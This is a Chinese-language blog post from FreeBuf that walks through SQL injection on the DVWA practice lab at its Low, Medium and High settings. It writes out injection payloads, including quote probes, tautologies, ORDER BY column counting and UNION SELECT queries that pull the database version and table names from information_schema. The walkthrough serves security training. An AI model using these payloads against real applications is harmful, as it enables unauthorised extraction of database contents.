freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

SQL Injection-黑盒测试
新之助 2023-04-13 08:44:24 220567
所属地 云南省

回显注入流程: 找注入点、判断列数、查数据

注释符:

  • #如果输入点是URL需要使用%23来代替
  • --空格

Low级别:

1.可以看到有一个输入框,输入1后点击Submit提交数据,回显了一个用户的信息

1681344656_64374890442198ecbaee6.png!small?1681344658153

2.接着我们在1后面加上一个单引号'

Payload:1'

页面返回错误,根据错误信息我们可以看出当前参数是被单引号包围的,我们多输了1个单引号就引发了报错说明可能存在sql注入而且是单引号字符型

此时语句可能为:SELECT name FROM table id='1''

1681344774_6437490643865b2510e42.png!small?1681344776149

3.接着我们进一步测试,构造一个恒真,恒假的语句来判断我们的输入是否影响到了数据库

根据上面猜测的SQL语句,我们的输入位置是被单引号包围的因此我们需要闭合左右两边的单引号

恒真Payload:1' and '1

当然也可以只闭合左边的单引号,注释掉后面的如 1' and 1#

可以看到页面并没有报错,此时SQL语句可能为SELECT name FROM table WHERE id='1' and '1'语句正确所以并没有报错

1681345107_64374a531b5f864f75fd1.png!small?1681345109007

接着我们在测试恒假的情况

恒假Payload:1' and '0

可以看到页面无返回了,此时SQL语句可能为SELECT name FROM table WHERE id='1' and '0'

语句正确所以没有报错,但是没有满足条件的所以就返回空

此时可以确定存在SQL注入漏洞,而且是字符型

1681345161_64374a895322aa369e728.png!small?1681345163220

4.接着根据SQL注入的流程就到了判断列数的时候了,我们还需要在末尾加上注释符

因为当前输入点是一个输入框所以可以直接使用#接着使用order by n判断列数

n为任意数字,如果当前表的列数大于等于n则正常回显,如果小于n则会报错,使用二分法

Payload:1' order by 4#

页面报错了说明当前表的列数小于4

此时SQL语句可能为SELECT name FROM table WHERE id='1' order by 4 #

1681345243_64374adbdfe62f9111f06.png!small?1681345246089

接着我们继续使用3来测试,也有错误1681345263_64374aef311384af685bc.png!small?1681345265111

再使用2来测试,可以看到页面回显正常,此时可以确定当前的数据库表有两个字段

1681345306_64374b1ac480702dfcdc4.png!small?1681345308690

5.接着我们union来爆出数据回显点因为存在两个字段,所以我们构造

Payload:1' union select 1,2#

可以看到数据回显点已经出来了,此时就可以使用MySQL的内置函数,和内置初始库来查询数据库的信息了

在回显点位置替换指定的函数或语句即可

1681345403_64374b7b114198131d4f5.png!small?1681345405002

6.接着为了显示方便观看,将原来正确的数据修改为错误的,只显示我们的union查询的数据,将1改为-1

并且查一下当前数据库,和版本

Payload:-1' union select database(),version()#

可以看到数据已经在会显点显示了

1681345493_64374bd5c343fdef83623.png!small?1681345495642

7.接着我们在查一下dvwa库下的表名

Payload:-1' union select (SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa'),2#

可以看到报错了,说明返回的数据存在多行,此时我们需要使用group_concat()函数将所有数据组合成一条信息返回也可以使用limit n,m来一条一条查询信息

1681345549_64374c0dccfe96031b91b.png!small?1681345551697

8.这里我们使用group_concat()来组合多条信息为一条返回

Payload:-1' union select (SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='dvwa'),2#

可以看到成功返回了当前数据库下所有的表名

1681345589_64374c354d5a6370e84df.png!small?1681345591182


Medium级别:

1.来到Medium级别可以看到没有输入框,但是可以提交数据

1681345648_64374c7059d2c0fe0bf59.png!small?1681345650227

2.可以提交数据意味着需要发送HTTP请求并且有数据回显,意味着HTTP请求当中一定存在参数,所以关门放Bp,开启浏览器代理,开启Bp,重新提交一次数据,可以看到Bp当中抓到了这个提交数据的请求包,是POST请求并且下面有参数,此时我们鼠标右键,将其发送到Repeater模块

1681345727_64374cbf7477ace22326d.png!small?1681345729522

3.在Repeater模块,我们可以对一个数据包进行多次重新提交数据包的操作,以方便我们测试

我们将参数改为id参数改为2,接着点击Send发送数据包,在响应模块中点击Render选项卡

可以看到响应的实际情况,可以看到页面正常回显了2好id的信息

1681345784_64374cf859b553d4823a1.png!small?1681345786391

4.接着我们在2后面加一个单引号,发现页面报错,报错信息为'\''我们的单引号被转义了

此时我们猜测这个参数可能是数字型注入

1681345858_64374d4230ca56ac4820d.png!small?1681345860172

5.接下来我们直接构造数字型的payload

恒真2 and 3>1可以看到页面正常的返回了信息

1681345943_64374d9702cb79c0c20ef.png!small?1681345945006

恒假3 and 2=1页面无返回信息,此时可以确定我们输入的数据影响到了系统原有的SQL语句

存在数字型的注入漏洞

1681345978_64374dba4a706bef53f81.png!small?1681345980692

6.根据回显注入的流程,此时就应该判断列数了构造payload为1 order by 3#

报错了,说明该表没有3列

1681346014_64374dde5bacf1c4c24fa.png!small?1681346016395

7.接着换成2,页面正常返回说明,存在两个字段

1681346041_64374df9d3416e0b33401.png!small?1681346043968

8.接着在查看数据的回显点,为了方便观察,我们将第一个查询的数据显示为空,构造一个不存在的数据

payload:-99 union select 1,2#

此时sql语句可能为,select column from table where id=-99 union select 1,2#

可以看到爆出了数据的回显点,此时就可以在数据回显点上查询数据了

1681346084_64374e245d42198c01515.png!small?1681346086339


High级别:

1.点击链接跳出输入框,输入1提交后数据正常回显

1681346151_64374e67eaf2f0477cca3.png!small?1681346153928

我们直接输入 1 and 0,页面没有反应,说明不是数字型

1681346188_64374e8c74a17d8f1985c.png!small?1681346190697

2.输入1'可以看到页面报错了

此时我们猜测我们输入的单引号影响到了原先的SQL语句

1681346411_64374f6bd7f14bcbfdb2e.png!small?1681346413890

3.接着我们使用基于单引号的payload测试

1' and '1可以看到页面回显正常

1681346484_64374fb473d0ef1ffa7ee.png!small?1681346486406

4.此时我们直接使用order by来判断列数1' order by 2#可以看到页面返回正常,说明存在两列

1681346505_64374fc91ffcf13d9df90.png!small?1681346507170

接着在改成 1' order by 3#可以看到又报错了,可以确定存在2列

1681346550_64374ff6acc9d84d55ac7.png!small?1681346552652

5.此时我们就可以使用union 查数据了

-1' union select version(),2#可以看到已经回显了数据库的版本了

1681346582_6437501670cb0f174b72c.png!small?1681346584427


# SQL Injection # dvwa靶场
本文为 新之助 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
DVWA靶场通关秘籍
新之助 LV.4
WEB漏洞靶场教学(适合刚开始接触的人看),从漏洞原理到手法,细节都有
  • 11 文章数
  • 4 关注者
SQL Injection(Blind)-黑盒测试
2023-04-13
File Upload-黑盒测试
2023-04-12
File Inclusion-黑盒测试
2023-04-12